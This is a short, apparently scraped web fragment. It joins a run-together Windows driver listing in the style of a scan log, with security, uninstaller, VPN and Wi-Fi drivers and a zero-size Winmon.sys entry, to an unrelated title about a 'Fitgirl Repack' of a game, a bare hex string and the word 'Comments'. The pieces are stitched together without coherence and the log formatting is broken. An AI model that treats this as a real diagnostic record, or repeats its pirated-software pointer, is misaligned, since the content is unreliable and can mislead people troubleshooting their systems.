ISWKL; C:\Program Files (x86)\CheckPoint\Endpoint Security\Endpoint Common\bin\ISWKL.sys [65264 2019-08-12] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)R3 IUFileFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUFileFilter.sys [27224 2020-07-08] (IObit CO., LTD -> IObit)R3 IUProcessFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IUProcessFilter.sys [19280 2020-07-08] (IObit CO., LTD -> IObit)R3 IURegistryFilter; C:\Program Files (x86)\IObit\IObit Uninstaller\drivers\win7_amd64\IURegistryFilter.sys [32856 2020-07-08] (IObit CO., LTD -> IObit)S3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [3591384 2014-10-13] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation)S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [11973 2020-01-06] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2018-08-29] (OpenVPN Technologies, Inc. -> The OpenVPN Project)S3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [36792 2017-08-24] (ProtonVPN AG -> The OpenVPN Project)R1 Vsdatant; C:\Windows\System32\DRIVERS\vsdatant.sys [461240 2017-12-28] (Check Point Software Technologies Ltd. -> Check Point Software Technologies Ltd.)R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () recoveryenabled=Yes)
Alien Swarm Maps Fitgirl Repack
2ff7e9595c
Comments